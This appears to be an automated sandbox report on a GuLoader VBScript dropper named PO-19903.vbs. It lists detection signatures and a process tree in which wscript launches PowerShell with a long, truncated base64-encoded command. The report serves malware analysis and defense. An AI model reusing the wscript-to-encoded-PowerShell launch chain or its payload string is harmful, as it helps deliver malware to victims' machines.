Edit tour
Windows
Analysis Report
PO-19903.vbs
Overview
General Information
Detection
GuLoader
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Wscript starts Powershell (via cmd or directly)
C2 URLs / IPs found in malware configuration
Potential malicious VBS script found (has network functionality)
Encrypted powershell cmdline option found
Very long command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Classification
- System is w10x64
- wscript.exe (PID: 6420 cmdline:
C:\Windows \System32\ wscript.ex e "C:\User s\user\Des ktop\PO-19 903.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) - powershell.exe (PID: 2404 cmdline:
C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe" - EncodedCom mand "IwBE AGkAcwBkAG EAaQAgAEQA aQBzAGgAdQ BtAGEANQAg AFMAbwByAH QAIABUAEEA RgBGAEUAIA BDAHIAYQBt AHAAbwBvAG 4AZAAgAEcA UgBVAE4AVA BJAE4ARwBC ACAAUAByAG UAYQBtAGIA dQBsAGEAdA AzACAAQQBz AHMAaQBtAG kAbAA2ACAA RgB1AHIAcw BlAG0AaQBk AGUAYgAgAE YAdQByAGkA ZQBuAHMAZA BlAGMAIABB AGwAYQByAG 0AdQByAGUA MgAgAEMAaA BvAHIAaQBi ACAASABVAE 0ATwAgAEYA SQBTAFQARQ BMAFMAVABF AE0AIABTAH QAZQBnAGUA IABjAGgAZQ BzAHMAZQAg AGIAYQByAH IAeQBtAG8A cgAgAEEAbg BuAGcAcgBl AHQAaABlAD MAIAANAAoA IwBSAGUAbQ BpAG4AZwBs AGkANAAgAG UAcgBuAHIA IABCAGUAcw BwAHkAdAAg AFMAdQBsAH AAaABvAHoA aQBuADgAIA BWAEkAUgBH AFUATABBAC AASQBGAFIA RAAgAEYAbw ByAGUAIABQ AGwAdQByAG EAbAB2AGUA awBzADEAIA BQAHIAbwBm AGkAbABlAG 4AdQAgAG4A bwBuAGYAbw AgAEkAbgBq AHUAcwB0AD kAIABOAG8A dQByAGkAcw BoAG0AZQBu ADMAIAB0AG 8AbQBhAGgA YQB2AGsAZQ BuACAARQBz AHMAYQB5AD EAIABCAEwA QQBBACAAdA ByAGEAbgBz AG0AbwBnAC AAaAB1AGwA awAgAGkAbg BsAGEAeQBl ACAADQAKAC MAawB2AGEA cgAgAEsAbw BiAGEAbgBn AGYAbwByAD YAIABIAHkA cABlAHIAYQ ByAGMANgAg AEcAQQBSAE QARQBSAE8A QgBFAE4AIA BPAG4AYwBv AHMAcABoAG UAcgBlACAA QgB1AG4AZw BsAGkAbgAg AEIAQQBSAF kAVAAgAFQA TwBNAEEAUw BUAEUAIABD AE8AUgBSAE 8AQgBPAFIA QQBUACAAQw BZAEsARQBM AFAAQQBSAC AAUwB0AGEA ZABzAGwAZw AzACAAQgBh AGMAaQBsAG wAZQBiACAA QgBMAFUAUg BUAEkATgAg AGEAZABtAG kAbgBpAHMA dAByACAATQ BpAGwAaQBl AHUAYgAzAC AAQgBsAGEA ZABlAGwAZQ A4ACAAYQBw AG8AbQBlAH QAYQBiACAA DQAKACMAUA BlAGEAbAA4 ACAASwBpAG 4AZwA5ACAA TwBwAG0Acg BrAGUAcgBj AG8AIABJAE QARQBMAEkA RwBFAFMASQ AgAFMAeQBz AHQAZQBtAG EAdAA3ACAA UAByAGUAbw BwAGUAcgAz ACAAUgBlAH MAbwAgAFMA UABBAEcATg BVAE0AIABM AGEAbgBkAC AAcgBlAGMA awBvAG4AaQ AgAGQAZQBw AHIAYQB2AG UAcgAgAGYA YQByAHQAag BzAGYAbwBy AHQAIABMAE EATgBOACAA RwByAGkAZg BmAG8AbgBh AGcAMwAgAE EARgBTAEUA IABoAGoAcw BkACAAYQBu AGEAbAB5AH MAZQBhAHIA YgAgAEEATQ BVAEwAQQBT ACAADQAKAC MAdQBuAGoA bwBsAGwAeQ AgAEkAbgBz AHQAcgB1AG 0AZQBuACAA RwBMAEEATA BJAEkATgBH AEwAIABSAG UAcwBvAGEA cAAgAFcAbw BtAGEAbgBp ACAATABlAG cAZwBpAGUA cgA1ACAAVQ BOAEIAUgBF AEEASwBJAE 4ARwAgAE8A cgBpAGwAbA BpAG8AIABh AGQAcgBlAG EAIABBAEwA VABPAEwAQQ BUACAARgBh AGcAbwAyAC AASQBuAGYA bABhAG0AbQ BhAHQANgAg AEMATwBDAE sATgBFAFkA RABPAE0AIA BTAFkATQBQ AE8AUwBJAC AAZwByAGEA dgBlAHIAZQ B1ACAARgBP AFIAVQBEAC AARgBBAFMA VABSAEUAUw BGAEkAIABL AG8AbgB0AH IAbwBsACAA UwBLAFIATA BFAFYAIABB AE4AQQBMAF kAVABJAEsA RQBSACAAVQ BOAEMAUgAg AFMAbwByAH QAcwByACAA dgBpAGQAbg BlAGYAcgBz ACAARQBPAE MAQQBSAEIA TwAgAFQAYQ BrAHQAIABC AGUAdAB2AG kAdgBsAGUA cgAzACAAVg BlAGwAYQBy ACAADQAKAC MAUgBlAHYA YQBuAGMAaA BlAHIAIABX AG8AcgBkAG EAYgBsAGUA cwAgAGwAbw B1AHMAaQBl AHIAbQBhAC AAaQBuAGQA bABvAGcAcg BiAHIAbgAg AEEAdAB0AG EAIABSAEUA QgBMAE8AVw BOAEcAVQAg AFEAVQBFAE IAUgBJAFQA SABDACAARw